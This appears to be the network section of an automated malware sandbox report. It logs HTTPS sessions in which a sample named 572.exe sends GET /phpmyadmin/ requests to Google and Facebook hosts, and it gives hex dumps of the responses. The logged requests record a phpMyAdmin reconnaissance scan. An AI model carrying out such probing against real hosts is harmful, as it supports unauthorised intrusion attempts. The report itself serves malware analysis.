                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC407INData Raw: 37 62 65 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 22 58 46 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 4c 54 52 22 20 64 61 74 61 2d 61 70 70 3d 22 70 75 62 6c 69 63 22 20 64 61 74 61 2d 74 65 6d 70 6c 61 74 65 3d 22 65 72 72 6f 72 22 20 64 61 74 61 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 20 64 61 74 61 2d 63 6f 6e 74 65 6e 74 2d 6b 65 79 20 64 61 74 61 2d 6c 6f 67 67 65 64 2d 69 6e 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 69 78 3d 22 78 66 5f 22 20 64 61 74 61 2d 63 73 72 66 3d 22 31 37 30 37 31 33 31 36 39 31 2c 32 64 37 36 32 30 38 36 66 39 36 31 36 32 37 65 33 66 31 30 61 62 38 30 65 37 37 39 62 62 30 62 22 20 64 61 74 61 2d 73 74 79 6c 65 2d 69 64 3d 22 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7bed<!DOCTYPE html><html id="XF" lang="en-US" dir="LTR" data-app="public" data-template="error" data-container-key data-content-key data-logged-in="false" data-cookie-prefix="xf_" data-csrf="1707131691,2d762086f961627e3f10ab80e779bb0b" data-style-id="1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 57 65 20 72 61 6e 20 69 6e 74 6f 20 73 6f 6d 65 20 70 72 6f 62 6c 65 6d 73 2e 20 7c 20 50 69 6e 6f 79 20 54 65 63 68 20 46 6f 72 75 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d 22 2f 77 65 62 6d 61 6e 69 66 65 73 74 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 33 66 34 38 36 37 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nt="width=device-width, initial-scale=1, viewport-fit=cover"><title>Oops! We ran into some problems. | Pinoy Tech Forum</title><link rel="manifest" href="/webmanifest.php"><meta name="theme-color" content="#3f4867" /><meta name="apple-mobile-web-app-t
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 72 5f 74 68 65 6d 65 5f 62 67 5f 70 69 63 6b 65 72 2e 6c 65 73 73 25 32 43 70 75 62 6c 69 63 25 33 41 78 65 6e 74 72 5f 74 6f 70 5f 73 65 63 74 69 6f 6e 2e 6c 65 73 73 25 32 43 70 75 62 6c 69 63 25 33 41 65 78 74 72 61 2e 6c 65 73 73 26 61 6d 70 3b 73 3d 31 37 26 61 6d 70 3b 6c 3d 31 26 61 6d 70 3b 64 3d 31 37 30 36 39 37 39 37 35 36 26 61 6d 70 3b 6b 3d 62 65 61 30 38 34 62 65 64 62 64 33 34 34 32 31 30 64 62 31 32 32 30 37 31 61 30 34 33 38 62 31 65 36 32 63 66 30 66 33 22 20 2f 3e 0a 3c 73 74 79 6c 65 3e 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 50 72 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 66 61 6c 7b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: r_theme_bg_picker.less%2Cpublic%3Axentr_top_section.less%2Cpublic%3Aextra.less&amp;s=17&amp;l=1&amp;d=1706979756&amp;k=bea084bedbd344210db122071a0438b1e62cf0f3" /><style>@font-face{font-family:'Font Awesome 5 Pro';font-style:normal;font-weight:300}.fal{
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 35 30 30 3b 36 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s/logo/favicon.png" sizes="32x32" /><link href="https://fonts.googleapis.com/css?family=Open+Sans:wght@300;400;500;600&subset=latin,latin-ext&display=swap" rel="stylesheet" type="text/css"><script async src="https://www.googletagmanager.com/gtag/js?id=G
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 42 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 20 70 69 63 6b 65 72 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 3e 0a 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 54 65 78 74 22 3e 42 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 20 70 69 63 6b 65 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 20 6d 65 6e 75 2d 2d 73 74 72 75 63 74 75 72 61 6c 20 6d 65 6e 75 2d 2d 6d 65 64 69 75 6d 22 20 64 61 74 61 2d 6d 65 6e 75 3d 22 6d 65 6e 75 22 20 61 72 69 61 2d 68 69 64 64 65 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aria-label="Background color picker" aria-expanded="false" aria-haspopup="true"><i aria-hidden="true"></i><span class="p-navgroup-linkText">Background color picker</span></a><div class="menu menu--structural menu--medium" data-menu="menu" aria-hidden
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 77 68 61 74 73 6e 65 77 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 57 68 61 74 26 23 30 33 39 3b 73 20 6e 65 77 22 20 74 69 74 6c 65 3d 22 57 68 61 74 26 23 30 33 39 3b 73 20 6e 65 77 22 3e 0a 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 54 65 78 74 22 3e 57 68 61 74 27 73 20 6e 65 77 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 73 65 61 72 63 68 2d 62 6f 64 79 22 20 69 64 3d 22 78 65 6e 74 72 53 65 61 72 63 68 22 3e 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 73 65 61 72 63 68 2f 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 73 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: whatsnew" aria-label="What&#039;s new" title="What&#039;s new"><i aria-hidden="true"></i><span class="p-navgroup-linkText">What's new</span></a><div class="p-search-body" id="xentrSearch"><form action="/search/search" method="post"><div class="p-se
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 64 69 76 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 78 66 54 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 31 37 30 37 31 33 31 36 39 31 2c 32 64 37 36 32 30 38 36 66 39 36 31 36 32 37 65 33 66 31 30 61 62 38 30 65 37 37 39 62 62 30 62 22 20 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 2f 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 6d 69 73 63 2f 73 74 79 6c 65 3f 73 74 79 6c 65 5f 69 64 3d 31 36 26 61 6d 70 3b 74 3d 31 37 30 37 31 33 31 36 39 31 25 32 43 32 64 37 36 32 30 38 36 66 39 36 31 36 32 37 65 33 66 31 30 61 62 38 30 65 37 37 39 62 62 30 62 22 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 20 74 68 65 6d 65 2d 73 77 69 74 63 68 65 72 22 20 64 61 74 61 2d 78 66 2d 69 6e 69 74 3d 22 74 6f 6f 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div><input type="hidden" name="_xfToken" value="1707131691,2d762086f961627e3f10ab80e779bb0b" /></form></div><a href="/misc/style?style_id=16&amp;t=1707131691%2C2d762086f961627e3f10ab80e779bb0b" class="p-navgroup-link theme-switcher" data-xf-init="tool
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 75 74 65 64 20 75 2d 73 6d 61 6c 6c 65 72 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 61 62 65 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 47 72 6f 75 70 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 47 72 6f 75 70 2d 74 65 78 74 22 20 69 64 3d 22 63 74 72 6c 5f 73 65 61 72 63 68 5f 6d 65 6e 75 5f 62 79 5f 6d 65 6d 62 65 72 22 3e 42 79 3a 3c 2f 73 70 61 6e 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 6e 61 6d 65 3d 22 63 5b 75 73 65 72 73 5d 22 20 64 61 74 61 2d 78 66 2d 69 6e 69 74 3d 22 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uted u-smaller" aria-hidden="true"></i></span></span></label></div><div class="menu-row"><div class="inputGroup"><span class="inputGroup-text" id="ctrl_search_menu_by_member">By:</span><input type="text" class="input" name="c[users]" data-xf-init="a
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 68 5f 68 6f 6c 69 64 61 79 5f 5f 63 61 74 65 67 6f 72 79 53 74 72 69 70 5f 5f 72 69 67 68 74 22 3e 3c 2f 64 69 76 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 2d 70 6c 61 69 6e 20 70 2d 6e 61 76 2d 6d 65 6e 75 54 72 69 67 67 65 72 20 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 78 66 2d 63 6c 69 63 6b 3d 22 6f 66 66 2d 63 61 6e 76 61 73 22 20 64 61 74 61 2d 6d 65 6e 75 3d 22 2e 6a 73 2d 68 65 61 64 65 72 4f 66 66 43 61 6e 76 61 73 4d 65 6e 75 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4d 65 6e 75 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 74 65 78 74 22 3e 0a 3c 69 20 61 72 69 61 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: iv><div class="th_holiday__categoryStrip__right"></div><button type="button" class="button--plain p-nav-menuTrigger button" data-xf-click="off-canvas" data-menu=".js-headerOffCanvasMenu" tabindex="0" aria-label="Menu"><span class="button-text"><i aria-
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 72 75 6d 73 22 3e 53 65 61 72 63 68 20 66 6f 72 75 6d 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 45 6c 20 22 20 64 61 74 61 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 3d 22 74 72 75 65 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 77 68 61 74 73 2d 6e 65 77 2f 22 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 45 6c 2d 6c 69 6e 6b 20 70 2d 6e 61 76 45 6c 2d 6c 69 6e 6b 2d 2d 73 70 6c 69 74 4d 65 6e 75 20 22 20 64 61 74 61 2d 6e 61 76 2d 69 64 3d 22 77 68 61 74 73 4e 65 77 22 3e 57 68 61 74 27 73 20 6e 65 77 3c 2f 61 3e 0a 3c 61 20 64 61 74 61 2d 78 66 2d 6b 65 79 3d 22 33 22 20 64 61 74 61 2d 78 66 2d 63 6c 69 63 6b 3d 22 6d 65 6e 75 22 20 64 61 74 61 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rums">Search forums</a></div></div></div></li><li><div class="p-navEl " data-has-children="true"><a href="/whats-new/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="whatsNew">What's new</a><a data-xf-key="3" data-xf-click="menu" data-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                29192.168.2.654661142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 36 6b 35 65 4c 38 65 68 77 50 4e 4a 38 5a 7a 52 77 6e 74 38 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a6k5eL8ehwPNJ8ZzRwnt8Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                30192.168.2.65490431.13.65.1443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC376INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: 9XB+9BdPzg1fKhoev7k4DbdurK+AzjVbb0mtYDzVNDyNAANAzeQX+LJdud9UTnzIoTmDYWrKnENJfPGdYLMwhA==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                31192.168.2.65461331.13.88.1443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC389INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: QExYUIi32XG7auovVRcGHCZXXRXcSeC7tF/28OkcA7u4tTklz+rQIA1l5tp6o6UKmBd9yzGV0qMSMnhYULWNHw==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                32192.168.2.65484831.13.65.1443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pl-pl.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC389INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?locale=pl_PL&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: ThfSFvj5lTdyUwI44BMMOvVBpK4ALLx5hdH5b6B6HOPhs2y5bnrH+7XA0546f1s5z2ttQHgbbJif6aZ301JXPg==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                33192.168.2.655166142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
